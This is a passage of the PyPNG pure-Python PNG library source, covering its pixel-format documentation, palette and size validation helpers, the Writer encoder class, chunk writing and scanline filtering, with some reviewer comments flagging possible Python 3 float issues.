8/16 bits per channel; colour mapped images (1/2/4/8 bit).
Adam7 interlacing is supported for reading and
writing. A number of optional chunks can be specified (when writing)
and understood (when reading): ``tRNS``, ``bKGD``, ``gAMA``.
For help, type ``import png; help(png)`` in your python interpreter.
A good place to start is the :class:`Reader` and :class:`Writer`
classes.
Requires Python 2.3. Limited support is available for Python 2.2, but
not everything works. Best with Python 2.4 and higher. Installation is
trivial, but see the ``README.txt`` file (with the source distribution)
for details.
This file can also be used as a command-line utility to convert
`Netpbm <http://netpbm.sourceforge.net/>`_ PNM files to PNG, and the
reverse conversion from PNG to PNM. The interface is similar to that
of the ``pnmtopng`` program from Netpbm. Type ``python png.py --help``
at the shell prompt for usage and a list of options.
A note on spelling and terminology
----------------------------------
Generally British English spelling is used in the documentation. So
that's "greyscale" and "colour". This not only matches the author's
native language, it's also used by the PNG specification.
The major colour models supported by PNG (and hence by PyPNG) are:
greyscale, RGB, greyscale--alpha, RGB--alpha. These are sometimes
referred to using the abbreviations: L, RGB, LA, RGBA. In this case
each letter abbreviates a single channel: *L* is for Luminance or Luma
or Lightness which is the channel used in greyscale images; *R*, *G*,
*B* stand for Red, Green, Blue, the components of a colour image; *A*
stands for Alpha, the opacity channel (used for transparency effects,
but higher values are more opaque, so it makes sense to call it
opacity).
A note on formats
-----------------
When getting pixel data out of this module (reading) and presenting
data to this module (writing) there are a number of ways the data could
be represented as a Python value. Generally this module uses one of
three formats called "flat row flat pixel", "boxed row flat pixel", and
"boxed row boxed pixel". Basically the concern is whether each pixel
and each row comes in its own little tuple (box), or not.
Consider an image that is 3 pixels wide by 2 pixels high, and each pixel
has RGB components:
Boxed row flat pixel::
list([R,G,B, R,G,B, R,G,B],
[R,G,B, R,G,B, R,G,B])
Each row appears as its own list, but the pixels are flattened so
that three values for one pixel simply follow the three values for
the previous pixel. This is the most common format used, because it
provides a good compromise between space and convenience. PyPNG regards
itself as at liberty to replace any sequence type with any sufficiently
compatible other sequence type; in practice each row is an array (from
the array module), and the outer list is sometimes an iterator rather
than an explicit list (so that streaming is possible).
Flat row flat pixel::
[R,G,B, R,G,B, R,G,B,
R,G,B, R,G,B, R,G,B]
The entire image is one single giant sequence of colour values.
Generally an array will be used (to save space), not a list.
Boxed row boxed pixel::
list([ (R,G,B), (R,G,B), (R,G,B) ],
[ (R,G,B), (R,G,B), (R,G,B) ])
Each row appears in its own list, but each pixel also appears in its own
tuple. A serious memory burn in Python.
In all cases the top row comes first, and for each row the pixels are
ordered from left-to-right. Within a pixel the values appear in the
order, R-G-B-A (or L-A for greyscale--alpha).
There is a fourth format, mentioned because it is used internally,
because it is close to what lies inside a PNG file itself, and because
it has some support from the public API. This format is called
packed. When packed,
each row is a sequence of bytes (integers from 0 to 255), just as
it is before PNG scanline filtering is applied. When the bit depth
is 8 this is essentially the same as boxed row flat pixel; when the
bit depth is less than 8, several pixels are packed into each byte;
when the bit depth is 16 (the only value more than 8 that is supported
by the PNG image format) each pixel value is decomposed into 2 bytes
(and `packed` is a misnomer). This format is used by the
:meth:`Writer.write_packed` method. It isn't usually a convenient
format, but may be just right if the source data for the PNG image
comes from something that uses a similar format (for example, 1-bit
BMPs, or another PNG file).
And now, my famous members
--------------------------
"""
# Module version string.
__version__ = "0.0.18"
import itertools
import math
# http://www.python.org/doc/2.4.4/lib/module-operator.html
import operator
import struct
import sys
# http://www.python.org/doc/2.4.4/lib/module-warnings.html
import warnings
import zlib
from array import array
from functools import reduce
try:
# `cpngfilters` is a Cython module: it must be compiled by
# Cython for this import to work.
# If this import does work, then it overrides pure-python
# filtering functions defined later in this file (see `class
# pngfilters`).
import cpngfilters as pngfilters
except ImportError:
pass
# Names exported by ``from png import *`` (the public API).
__all__ = ['Image', 'Reader', 'Writer', 'write_chunks', 'from_array']
# The PNG signature: the fixed 8-byte prefix of every PNG file.
# http://www.w3.org/TR/PNG/#5PNG-file-signature
_signature = struct.pack('8B', 137, 80, 78, 71, 13, 10, 26, 10)

# Adam7 interlace passes.  Each entry appears to be
# (x start, y start, x step, y step) for one of the seven passes,
# matching the Adam7 pattern in the PNG specification -- confirm
# against the consuming code (outside this section).
_adam7 = ((0, 0, 8, 8),
          (4, 0, 8, 8),
          (0, 4, 4, 8),
          (2, 0, 4, 4),
          (0, 2, 2, 4),
          (1, 0, 2, 2),
          (0, 1, 1, 2))
def group(s, n):
    """Chop sequence *s* into a list of *n*-tuples; any trailing
    elements that do not fill a complete tuple are discarded.
    """
    # n references to a single shared iterator: each output tuple
    # consumes n consecutive items (zip stops at the shortest, which
    # silently drops an incomplete final group).
    shared = iter(s)
    return list(zip(*([shared] * n)))
def isarray(x):
    """Return True when *x* is an ``array.array`` instance."""
    return isinstance(x, array)
def tostring(row):
    """Convert *row* (typically an ``array.array``) to a byte string.

    ``array.tostring`` was deprecated in Python 3.2 and removed in
    Python 3.9, so prefer ``tobytes`` and fall back to ``tostring``
    only on old interpreters (e.g. Python 2) that lack it.
    """
    try:
        return row.tobytes()
    except AttributeError:
        # Old Python: arrays only provide tostring().
        return row.tostring()
def interleave_planes(ipixels, apixels, ipsize, apsize):
    """
    Interleave (colour) planes, e.g. RGB + A = RGBA.

    Build and return a new array in which each pixel consists of the
    `ipsize` values from the corresponding pixel of `ipixels` followed
    by the `apsize` values from the corresponding pixel of `apixels`.
    Conventionally both inputs are byte arrays, but any two arrays of
    the same typecode work; the result uses that same typecode.
    """
    n_image = len(ipixels)
    n_alpha = len(apixels)
    n_out = n_image + n_alpha
    stride = ipsize + apsize
    # Allocate an output buffer of the final length by concatenating
    # the inputs; every element is overwritten by the slice
    # assignments below.
    out = array(ipixels.typecode)
    out.extend(ipixels)
    out.extend(apixels)
    # Scatter each image channel into its interleaved positions.
    for channel in range(ipsize):
        out[channel:n_out:stride] = ipixels[channel:n_image:ipsize]
    # Scatter each alpha channel after the image channels of each pixel.
    for channel in range(apsize):
        out[channel + ipsize:n_out:stride] = apixels[channel:n_alpha:apsize]
    return out
def check_palette(palette):
    """Validate a palette argument (to the :class:`Writer` class).

    Returns the palette as a list when valid; raises ValueError
    otherwise.  ``None`` (the default, meaning "no palette") is
    returned unchanged.
    """
    if palette is None:
        return None
    entries = list(palette)
    if len(entries) < 1 or len(entries) > 256:
        raise ValueError("a palette must have between 1 and 256 entries")
    seen_triple = False
    for index, entry in enumerate(entries):
        if len(entry) not in (3, 4):
            raise ValueError(
                "palette entry %d: entries must be 3- or 4-tuples." % index)
        if len(entry) == 3:
            seen_triple = True
        # PNG stores RGBA palette entries (tRNS) before RGB-only ones,
        # so every 4-tuple must come before the first 3-tuple.
        if seen_triple and len(entry) == 4:
            raise ValueError(
                "palette entry %d: all 4-tuples must precede all 3-tuples"
                % index)
        for channel in entry:
            if int(channel) != channel or not (0 <= channel <= 255):
                raise ValueError(
                    "palette entry %d: values must be integer: 0 <= x <= 255"
                    % index)
    return entries
def check_sizes(size, width, height):
    """Check that the `size`, `width`, and `height` arguments are
    mutually consistent.  Returns a (width, height) pair.
    """
    # No size argument: the separate width/height pair wins.
    if not size:
        return width, height
    if len(size) != 2:
        raise ValueError(
            "size argument should be a pair (width, height)")
    w, h = size
    if width is not None and width != w:
        raise ValueError(
            "size[0] (%r) and width (%r) should match when both are used."
            % (w, width))
    if height is not None and height != h:
        raise ValueError(
            "size[1] (%r) and height (%r) should match when both are used."
            % (h, height))
    return size
def check_color(c, greyscale, which):
    """Validate a colour argument for the transparent or background
    options.  Returns the colour; for greyscale a bare integer is
    normalised ("corrected") to a 1-tuple.  Raises ValueError when the
    colour has the wrong arity or non-integer components.
    """
    if c is None:
        return c
    if greyscale:
        # Accept a bare number by wrapping it into a 1-tuple.
        try:
            len(c)
        except TypeError:
            c = (c,)
        if len(c) != 1:
            raise ValueError("%s for greyscale must be 1-tuple" %
                which)
        if not isinteger(c[0]):
            raise ValueError(
                "%s colour for greyscale must be integer" % which)
    else:
        # Colour images require an (R, G, B) triple of integers.
        well_formed = (len(c) == 3 and
                       isinteger(c[0]) and
                       isinteger(c[1]) and
                       isinteger(c[2]))
        if not well_formed:
            raise ValueError(
                "%s colour must be a triple of integers" % which)
    return c
class Error(Exception):
    """Base class for the errors raised by this module."""
    def __str__(self):
        detail = ' '.join(self.args)
        return '{0}: {1}'.format(self.__class__.__name__, detail)
class FormatError(Error):
    """Problem with input file format.  In other words, the PNG file
    does not conform to the specification in some way and is invalid.
    """
class ChunkError(FormatError):
    """A :class:`FormatError` localised to an individual PNG chunk."""
    pass
class Writer:
    """
    PNG encoder in pure Python.
    """
    def __init__(self, width=None, height=None,
                 size=None,
                 greyscale=False,
                 alpha=False,
                 bitdepth=8,
                 palette=None,
                 transparent=None,
                 background=None,
                 gamma=None,
                 compression=None,
                 interlace=False,
                 bytes_per_sample=None, # deprecated
                 planes=None,
                 colormap=None,
                 maxval=None,
                 chunk_limit=2**20,
                 x_pixels_per_unit = None,
                 y_pixels_per_unit = None,
                 unit_is_meter = False):
        """
        Create a PNG encoder object.

        Arguments:

        width, height
          Image size in pixels, as two separate arguments.
        size
          Image size (w,h) in pixels, as single argument.
        greyscale
          Input data is greyscale, not RGB.
        alpha
          Input data has alpha channel (RGBA or LA).
        bitdepth
          Bit depth: from 1 to 16.
        palette
          Create a palette for a colour mapped image (colour type 3).
        transparent
          Specify a transparent colour (create a ``tRNS`` chunk).
        background
          Specify a default background colour (create a ``bKGD`` chunk).
        gamma
          Specify a gamma value (create a ``gAMA`` chunk).
        compression
          zlib compression level: 0 (none) to 9 (more compressed);
          default: -1 or None.
        interlace
          Create an interlaced image.
        chunk_limit
          Write multiple ``IDAT`` chunks to save memory.
        x_pixels_per_unit
          Number of pixels a unit along the x axis (write a
          `pHYs` chunk).
        y_pixels_per_unit
          Number of pixels a unit along the y axis (write a
          `pHYs` chunk). Along with `x_pixel_unit`, this gives
          the pixel size ratio.
        unit_is_meter
          `True` to indicate that the unit (for the `pHYs`
          chunk) is metre.

        The image size (in pixels) can be specified either by using the
        `width` and `height` arguments, or with the single `size`
        argument. If `size` is used it should be a pair (*width*,
        *height*).

        `greyscale` and `alpha` are booleans that specify whether
        an image is greyscale (or colour), and whether it has an
        alpha channel (or not).

        `bitdepth` specifies the bit depth of the source pixel values.
        Each source pixel value must be an integer between 0 and
        ``2**bitdepth-1``. For example, 8-bit images have values
        between 0 and 255. PNG only stores images with bit depths of
        1,2,4,8, or 16. When `bitdepth` is not one of these values,
        the next highest valid bit depth is selected, and an ``sBIT``
        (significant bits) chunk is generated that specifies the
        original precision of the source image. In this case the
        supplied pixel values will be rescaled to fit the range of
        the selected bit depth.

        The details of which bit depth / colour model combinations the
        PNG file format supports directly, are somewhat arcane
        (refer to the PNG specification for full details). Briefly:
        "small" bit depths (1,2,4) are only allowed with greyscale and
        colour mapped images; colour mapped images cannot have bit depth
        16.

        For colour mapped images (in other words, when the `palette`
        argument is specified) the `bitdepth` argument must match one of
        the valid PNG bit depths: 1, 2, 4, or 8. (It is valid to have a
        PNG image with a palette and an ``sBIT`` chunk, but the meaning
        is slightly different; it would be awkward to press the
        `bitdepth` argument into service for this.)

        The `palette` option, when specified, causes a colour
        mapped image to be created: the PNG colour type is set to 3;
        `greyscale` must not be set; `alpha` must not be set;
        `transparent` must not be set; the bit depth must be 1,2,4,
        or 8. When a colour mapped image is created, the pixel values
        are palette indexes and the `bitdepth` argument specifies the
        size of these indexes (not the size of the colour values in
        the palette).

        The palette argument value should be a sequence of 3- or
        4-tuples. 3-tuples specify RGB palette entries; 4-tuples
        specify RGBA palette entries. If both 4-tuples and 3-tuples
        appear in the sequence then all the 4-tuples must come
        before all the 3-tuples. A ``PLTE`` chunk is created; if there
        are 4-tuples then a ``tRNS`` chunk is created as well. The
        ``PLTE`` chunk will contain all the RGB triples in the same
        sequence; the ``tRNS`` chunk will contain the alpha channel for
        all the 4-tuples, in the same sequence. Palette entries
        are always 8-bit.

        If specified, the `transparent` and `background` parameters must
        be a tuple with three integer values for red, green, blue, or
        a simple integer (or singleton tuple) for a greyscale image.

        If specified, the `gamma` parameter must be a positive number
        (generally, a `float`). A ``gAMA`` chunk will be created.
        Note that this will not change the values of the pixels as
        they appear in the PNG file, they are assumed to have already
        been converted appropriately for the gamma specified.

        The `compression` argument specifies the compression level to
        be used by the ``zlib`` module. Values from 1 to 9 specify
        compression, with 9 being "more compressed" (usually smaller
        and slower, but it doesn't always work out that way). 0 means
        no compression. -1 and ``None`` both mean that the default
        level of compession will be picked by the ``zlib`` module
        (which is generally acceptable).

        If `interlace` is true then an interlaced image is created
        (using PNG's so far only interace method, *Adam7*). This does
        not affect how the pixels should be presented to the encoder,
        rather it changes how they are arranged into the PNG file.
        On slow connexions interlaced images can be partially decoded
        by the browser to give a rough view of the image that is
        successively refined as more image data appears.

        .. note ::

          Enabling the `interlace` option requires the entire image
          to be processed in working memory.

        `chunk_limit` is used to limit the amount of memory used whilst
        compressing the image. In order to avoid using large amounts of
        memory, multiple ``IDAT`` chunks may be created.
        """
        # At the moment the `planes` argument is ignored;
        # its purpose is to act as a dummy so that
        # ``Writer(x, y, **info)`` works, where `info` is a dictionary
        # returned by Reader.read and friends.
        # Ditto for `colormap`.
        width, height = check_sizes(size, width, height)
        del size
        if width <= 0 or height <= 0:
            raise ValueError("width and height must be greater than zero")
        if not isinteger(width) or not isinteger(height):
            raise ValueError("width and height must be integers")
        # http://www.w3.org/TR/PNG/#7Integers-and-byte-order
        if width > 2**32-1 or height > 2**32-1:
            raise ValueError("width and height cannot exceed 2**32-1")
        if alpha and transparent is not None:
            raise ValueError(
                "transparent colour not allowed with alpha channel")
        if bytes_per_sample is not None:
            # Legacy spelling of bitdepth; converted then discarded.
            warnings.warn('please use bitdepth instead of bytes_per_sample',
                          DeprecationWarning)
            if bytes_per_sample not in (0.125, 0.25, 0.5, 1, 2):
                raise ValueError(
                    "bytes per sample must be .125, .25, .5, 1, or 2")
            bitdepth = int(8*bytes_per_sample)
        del bytes_per_sample
        if not isinteger(bitdepth) or bitdepth < 1 or 16 < bitdepth:
            raise ValueError("bitdepth (%r) must be a positive integer <= 16" %
              bitdepth)
        # When a non-PNG bitdepth is requested, `rescale` records
        # (source depth, target depth) so write_passes can scale
        # samples up and emit an sBIT chunk.
        self.rescale = None
        palette = check_palette(palette)
        if palette:
            if bitdepth not in (1,2,4,8):
                raise ValueError("with palette, bitdepth must be 1, 2, 4, or 8")
            if transparent is not None:
                raise ValueError("transparent and palette not compatible")
            if alpha:
                raise ValueError("alpha and palette not compatible")
            if greyscale:
                raise ValueError("greyscale and palette not compatible")
        else:
            # No palette, check for sBIT chunk generation.
            if alpha or not greyscale:
                if bitdepth not in (8,16):
                    targetbitdepth = (8,16)[bitdepth > 8]
                    self.rescale = (bitdepth, targetbitdepth)
                    bitdepth = targetbitdepth
                    del targetbitdepth
            else:
                assert greyscale
                assert not alpha
                if bitdepth not in (1,2,4,8,16):
                    if bitdepth > 8:
                        targetbitdepth = 16
                    elif bitdepth == 3:
                        targetbitdepth = 4
                    else:
                        assert bitdepth in (5,6,7)
                        targetbitdepth = 8
                    self.rescale = (bitdepth, targetbitdepth)
                    bitdepth = targetbitdepth
                    del targetbitdepth
        if bitdepth < 8 and (alpha or not greyscale and not palette):
            raise ValueError(
              "bitdepth < 8 only permitted with greyscale or palette")
        if bitdepth > 8 and palette:
            raise ValueError(
                "bit depth must be 8 or less for images with palette")
        transparent = check_color(transparent, greyscale, 'transparent')
        background = check_color(background, greyscale, 'background')
        # It's important that the true boolean values (greyscale, alpha,
        # colormap, interlace) are converted to bool because Iverson's
        # convention is relied upon later on.
        self.width = width
        self.height = height
        self.transparent = transparent
        self.background = background
        self.gamma = gamma
        self.greyscale = bool(greyscale)
        self.alpha = bool(alpha)
        self.colormap = bool(palette)
        self.bitdepth = int(bitdepth)
        self.compression = compression
        self.chunk_limit = chunk_limit
        self.interlace = bool(interlace)
        self.palette = palette
        self.x_pixels_per_unit = x_pixels_per_unit
        self.y_pixels_per_unit = y_pixels_per_unit
        self.unit_is_meter = bool(unit_is_meter)
        # PNG colour type is a bit field: 4 => alpha, 2 => colour,
        # 1 => palette (see the assert on the next line for the legal
        # combinations).
        self.color_type = 4*self.alpha + 2*(not greyscale) + 1*self.colormap
        assert self.color_type in (0,2,3,4,6)
        # Colour planes: 3 for RGB, 1 for greyscale or palette
        # (Iverson-style tuple indexing on the boolean).
        self.color_planes = (3,1)[self.greyscale or self.colormap]
        self.planes = self.color_planes + self.alpha
        # :todo: fix for bitdepth < 8
        # NOTE(review): true division makes psize a float on Python 3
        # (e.g. 1.0 for 8-bit grey) — confirm downstream arithmetic
        # (e.g. Reader.undo_filter's filter unit) tolerates this.
        self.psize = (self.bitdepth/8) * self.planes
    def make_palette(self):
        """Create the byte sequences for a ``PLTE`` and if necessary a
        ``tRNS`` chunk.  Returned as a pair (*p*, *t*).  *t* will be
        ``None`` if no ``tRNS`` chunk is necessary.
        """
        p = array('B')
        t = array('B')
        for x in self.palette:
            p.extend(x[0:3])
            if len(x) > 3:
                t.append(x[3])
        p = tostring(p)
        t = tostring(t)
        if t:
            return p,t
        return p,None
    def write(self, outfile, rows):
        """Write a PNG image to the output file.  `rows` should be
        an iterable that yields each row in boxed row flat pixel
        format.  The rows should be the rows of the original image,
        so there should be ``self.height`` rows of ``self.width *
        self.planes`` values.  If `interlace` is specified (when
        creating the instance), then an interlaced PNG file will
        be written.  Supply the rows in the normal image order;
        the interlacing is carried out internally.

        .. note ::

          Interlacing will require the entire image to be in working
          memory.
        """
        if self.interlace:
            # Interlacing re-orders rows, so the whole image must be
            # materialised first.
            fmt = 'BH'[self.bitdepth > 8]
            a = array(fmt, itertools.chain(*rows))
            return self.write_array(outfile, a)
        nrows = self.write_passes(outfile, rows)
        if nrows != self.height:
            raise ValueError(
              "rows supplied (%d) does not match height (%d)" %
              (nrows, self.height))
    def write_passes(self, outfile, rows, packed=False):
        """
        Write a PNG image to the output file.

        Most users are expected to find the :meth:`write` or
        :meth:`write_array` method more convenient.

        The rows should be given to this method in the order that
        they appear in the output file.  For straightlaced images,
        this is the usual top to bottom ordering, but for interlaced
        images the rows should have already been interlaced before
        passing them to this function.

        `rows` should be an iterable that yields each row.  When
        `packed` is ``False`` the rows should be in boxed row flat pixel
        format; when `packed` is ``True`` each row should be a packed
        sequence of bytes.
        """
        # http://www.w3.org/TR/PNG/#5PNG-file-signature
        outfile.write(_signature)
        # http://www.w3.org/TR/PNG/#11IHDR
        write_chunk(outfile, b'IHDR',
                    struct.pack("!2I5B", self.width, self.height,
                                self.bitdepth, self.color_type,
                                0, 0, self.interlace))
        # See :chunk:order
        # http://www.w3.org/TR/PNG/#11gAMA
        if self.gamma is not None:
            write_chunk(outfile, b'gAMA',
                        struct.pack("!L", int(round(self.gamma*1e5))))
        # See :chunk:order
        # http://www.w3.org/TR/PNG/#11sBIT
        if self.rescale:
            write_chunk(outfile, b'sBIT',
                struct.pack('%dB' % self.planes,
                            *[self.rescale[0]]*self.planes))
        # :chunk:order: Without a palette (PLTE chunk), ordering is
        # relatively relaxed.  With one, gAMA chunk must precede PLTE
        # chunk which must precede tRNS and bKGD.
        # See http://www.w3.org/TR/PNG/#5ChunkOrdering
        if self.palette:
            p,t = self.make_palette()
            write_chunk(outfile, b'PLTE', p)
            if t:
                # tRNS chunk is optional.  Only needed if palette entries
                # have alpha.
                write_chunk(outfile, b'tRNS', t)
        # http://www.w3.org/TR/PNG/#11tRNS
        if self.transparent is not None:
            if self.greyscale:
                write_chunk(outfile, b'tRNS',
                            struct.pack("!1H", *self.transparent))
            else:
                write_chunk(outfile, b'tRNS',
                            struct.pack("!3H", *self.transparent))
        # http://www.w3.org/TR/PNG/#11bKGD
        if self.background is not None:
            if self.greyscale:
                write_chunk(outfile, b'bKGD',
                            struct.pack("!1H", *self.background))
            else:
                write_chunk(outfile, b'bKGD',
                            struct.pack("!3H", *self.background))
        # http://www.w3.org/TR/PNG/#11pHYs
        if self.x_pixels_per_unit is not None and self.y_pixels_per_unit is not None:
            tup = (self.x_pixels_per_unit, self.y_pixels_per_unit, int(self.unit_is_meter))
            write_chunk(outfile, b'pHYs', struct.pack("!LLB",*tup))
        # http://www.w3.org/TR/PNG/#11IDAT
        if self.compression is not None:
            compressor = zlib.compressobj(self.compression)
        else:
            compressor = zlib.compressobj()
        # Choose an extend function based on the bitdepth.  The extend
        # function packs/decomposes the pixel values into bytes and
        # stuffs them onto the data array.
        data = array('B')
        if self.bitdepth == 8 or packed:
            extend = data.extend
        elif self.bitdepth == 16:
            # Decompose into bytes
            def extend(sl):
                fmt = '!%dH' % len(sl)
                data.extend(array('B', struct.pack(fmt, *sl)))
        else:
            # Pack into bytes
            assert self.bitdepth < 8
            # samples per byte
            spb = int(8/self.bitdepth)
            def extend(sl):
                a = array('B', sl)
                # Adding padding bytes so we can group into a whole
                # number of spb-tuples.
                l = float(len(a))
                extra = math.ceil(l / float(spb))*spb - l
                a.extend([0]*int(extra))
                # Pack into bytes
                l = group(a, spb)
                l = [reduce(lambda x,y:
                                           (x << self.bitdepth) + y, e) for e in l]
                data.extend(l)
        if self.rescale:
            # Wrap extend so that source samples are scaled up to the
            # target bit depth before being packed.
            oldextend = extend
            factor = \
              float(2**self.rescale[1]-1) / float(2**self.rescale[0]-1)
            def extend(sl):
                oldextend([int(round(factor*x)) for x in sl])
        # Build the first row, testing mostly to see if we need to
        # changed the extend function to cope with NumPy integer types
        # (they cause our ordinary definition of extend to fail, so we
        # wrap it).  See
        # http://code.google.com/p/pypng/issues/detail?id=44
        enumrows = enumerate(rows)
        del rows
        # First row's filter type.
        data.append(0)
        # :todo: Certain exceptions in the call to ``.next()`` or the
        # following try would indicate no row data supplied.
        # Should catch.
        i,row = next(enumrows)
        try:
            # If this fails...
            extend(row)
        except:
            # ... try a version that converts the values to int first.
            # Not only does this work for the (slightly broken) NumPy
            # types, there are probably lots of other, unknown, "nearly"
            # int types it works for.
            def wrapmapint(f):
                return lambda sl: f([int(x) for x in sl])
            extend = wrapmapint(extend)
            del wrapmapint
            extend(row)
        for i,row in enumrows:
            # Add "None" filter type.  Currently, it's essential that
            # this filter type be used for every scanline as we do not
            # mark the first row of a reduced pass image; that means we
            # could accidentally compute the wrong filtered scanline if
            # we used "up", "average", or "paeth" on such a line.
            data.append(0)
            extend(row)
            if len(data) > self.chunk_limit:
                # Flush a partial IDAT chunk to bound memory use.
                compressed = compressor.compress(tostring(data))
                if len(compressed):
                    write_chunk(outfile, b'IDAT', compressed)
                # Because of our very witty definition of ``extend``,
                # above, we must re-use the same ``data`` object.  Hence
                # we use ``del`` to empty this one, rather than create a
                # fresh one (which would be my natural FP instinct).
                del data[:]
        if len(data):
            compressed = compressor.compress(tostring(data))
        else:
            compressed = b''
        flushed = compressor.flush()
        if len(compressed) or len(flushed):
            write_chunk(outfile, b'IDAT', compressed + flushed)
        # http://www.w3.org/TR/PNG/#11IEND
        write_chunk(outfile, b'IEND')
        return i+1
    def write_array(self, outfile, pixels):
        """
        Write an array in flat row flat pixel format as a PNG file on
        the output file.  See also :meth:`write` method.
        """
        if self.interlace:
            self.write_passes(outfile, self.array_scanlines_interlace(pixels))
        else:
            self.write_passes(outfile, self.array_scanlines(pixels))
    def write_packed(self, outfile, rows):
        """
        Write PNG file to `outfile`.  The pixel data comes from `rows`
        which should be in boxed row packed format.  Each row should be
        a sequence of packed bytes.

        Technically, this method does work for interlaced images but it
        is best avoided.  For interlaced images, the rows should be
        presented in the order that they appear in the file.

        This method should not be used when the source image bit depth
        is not one naturally supported by PNG; the bit depth should be
        1, 2, 4, 8, or 16.
        """
        if self.rescale:
            raise Error("write_packed method not suitable for bit depth %d" %
              self.rescale[0])
        return self.write_passes(outfile, rows, packed=True)
    def convert_pnm(self, infile, outfile):
        """
        Convert a PNM file containing raw pixel data into a PNG file
        with the parameters set in the writer object.  Works for
        (binary) PGM, PPM, and PAM formats.
        """
        # NOTE(review): (self.bitdepth/8) is a float under Python 3;
        # array.fromfile may require an integer count — confirm.
        if self.interlace:
            pixels = array('B')
            pixels.fromfile(infile,
                            (self.bitdepth/8) * self.color_planes *
                            self.width * self.height)
            self.write_passes(outfile, self.array_scanlines_interlace(pixels))
        else:
            self.write_passes(outfile, self.file_scanlines(infile))
    def convert_ppm_and_pgm(self, ppmfile, pgmfile, outfile):
        """
        Convert a PPM and PGM file containing raw pixel data into a
        PNG outfile with the parameters set in the writer object.
        """
        # NOTE(review): same float-count concern as convert_pnm above.
        pixels = array('B')
        pixels.fromfile(ppmfile,
                        (self.bitdepth/8) * self.color_planes *
                        self.width * self.height)
        apixels = array('B')
        apixels.fromfile(pgmfile,
                         (self.bitdepth/8) *
                         self.width * self.height)
        pixels = interleave_planes(pixels, apixels,
                                   (self.bitdepth/8) * self.color_planes,
                                   (self.bitdepth/8))
        if self.interlace:
            self.write_passes(outfile, self.array_scanlines_interlace(pixels))
        else:
            self.write_passes(outfile, self.array_scanlines(pixels))
    def file_scanlines(self, infile):
        """
        Generates boxed rows in flat pixel format, from the input file
        `infile`.  It assumes that the input file is in a "Netpbm-like"
        binary format, and is positioned at the beginning of the first
        pixel.  The number of pixels to read is taken from the image
        dimensions (`width`, `height`, `planes`) and the number of bytes
        per value is implied by the image `bitdepth`.
        """
        # Values per row
        vpr = self.width * self.planes
        row_bytes = vpr
        if self.bitdepth > 8:
            assert self.bitdepth == 16
            row_bytes *= 2
            fmt = '>%dH' % vpr
            def line():
                return array('H', struct.unpack(fmt, infile.read(row_bytes)))
        else:
            def line():
                scanline = array('B', infile.read(row_bytes))
                return scanline
        for y in range(self.height):
            yield line()
    def array_scanlines(self, pixels):
        """
        Generates boxed rows (flat pixels) from flat rows (flat pixels)
        in an array.
        """
        # Values per row
        vpr = self.width * self.planes
        stop = 0
        for y in range(self.height):
            start = stop
            stop = start + vpr
            yield pixels[start:stop]
    def array_scanlines_interlace(self, pixels):
        """
        Generator for interlaced scanlines from an array.  `pixels` is
        the full source image in flat row flat pixel format.  The
        generator yields each scanline of the reduced passes in turn, in
        boxed row flat pixel format.
        """
        # http://www.w3.org/TR/PNG/#8InterlaceMethods
        # Array type.
        fmt = 'BH'[self.bitdepth > 8]
        # Value per row
        vpr = self.width * self.planes
        for xstart, ystart, xstep, ystep in _adam7:
            if xstart >= self.width:
                continue
            # Pixels per row (of reduced image)
            ppr = int(math.ceil((self.width-xstart)/float(xstep)))
            # number of values in reduced image row.
            row_len = ppr*self.planes
            for y in range(ystart, self.height, ystep):
                if xstep == 1:
                    # Pass covers whole rows; slice them out directly.
                    offset = y * vpr
                    yield pixels[offset:offset+vpr]
                else:
                    row = array(fmt)
                    # There's no easier way to set the length of an array
                    row.extend(pixels[0:row_len])
                    offset = y * vpr + xstart * self.planes
                    end_offset = (y+1) * vpr
                    skip = self.planes * xstep
                    for i in range(self.planes):
                        row[i::self.planes] = \
                            pixels[offset+i:end_offset:skip]
                    yield row
def write_chunk(outfile, tag, data=b''):
    """
    Write a single PNG chunk to the output file: 4-byte big-endian
    length, 4-byte tag, data, and 4-byte CRC-32 over tag and data.
    """
    # http://www.w3.org/TR/PNG/#5Chunk-layout
    outfile.write(struct.pack("!I", len(data)))
    outfile.write(tag)
    outfile.write(data)
    # CRC covers tag then data; mask to an unsigned 32-bit value
    # because zlib.crc32 signedness has varied across versions.
    checksum = zlib.crc32(data, zlib.crc32(tag)) & (2**32 - 1)
    outfile.write(struct.pack("!I", checksum))
def write_chunks(out, chunks):
    """Create a PNG file on `out`: the PNG signature followed by every
    (tag, data) chunk in `chunks`.
    """
    out.write(_signature)
    for tag_and_data in chunks:
        write_chunk(out, *tag_and_data)
def filter_scanline(type, line, fo, prev=None):
    """Apply a scanline filter to a scanline.  `type` specifies the
    filter type (0 to 4); `line` is the current (unfiltered) scanline
    as a sequence of bytes; `prev` is the previous (unfiltered)
    scanline as a sequence of bytes (or ``None`` for the first line).
    `fo` is the filter offset: normally the size of a pixel in bytes,
    but 1 for bit depths below 8.  Returns the filtered scanline as a
    byte array, prefixed with the filter-type byte.
    """
    assert 0 <= type < 5
    # The filter-type byte is emitted first.  Note that it is the
    # *original* type even when the first-line simplifications below
    # switch to an equivalent algorithm.
    out = array('B', [type])
    if not prev:
        # First line of a pass: with an implicit all-zero previous
        # line, "up" degenerates to "none" and "paeth" to "sub"
        # (non-trivial, but true); "average" just needs the zero line
        # synthesized explicitly.
        if type == 2:       # "up"
            type = 0
        elif type == 3:     # "average"
            prev = [0] * len(line)
        elif type == 4:     # "paeth"
            type = 1
    if type == 0:
        out.extend(line)
    elif type == 1:
        # Sub: difference with the byte `fo` positions to the left.
        left = -fo
        for cur in line:
            out.append((cur - line[left]) & 0xff if left >= 0 else cur)
            left += 1
    elif type == 2:
        # Up: difference with the byte directly above.
        for pos, cur in enumerate(line):
            out.append((cur - prev[pos]) & 0xff)
    elif type == 3:
        # Average of the left and above bytes (integer floor).
        left = -fo
        for pos, cur in enumerate(line):
            a = line[left] if left >= 0 else 0
            out.append((cur - ((a + prev[pos]) >> 1)) & 0xff)
            left += 1
    else:
        # Paeth predictor, http://www.w3.org/TR/PNG/#9Filter-type-4-Paeth
        left = -fo
        for pos, cur in enumerate(line):
            a = line[left] if left >= 0 else 0
            b = prev[pos]
            c = prev[left] if left >= 0 else 0
            p = a + b - c
            pa = abs(p - a)
            pb = abs(p - b)
            pc = abs(p - c)
            if pa <= pb and pa <= pc:
                predictor = a
            elif pb <= pc:
                predictor = b
            else:
                predictor = c
            out.append((cur - predictor) & 0xff)
            left += 1
    return out
def from_array(a, mode=None, info=None):
    """Create a PNG :class:`Image` object from a 2- or 3-dimensional
    array.  One application of this function is easy PIL-style saving:
    ``png.from_array(pixels, 'L').save('foo.png')``.

    Unless they are specified using the *info* parameter, the PNG's
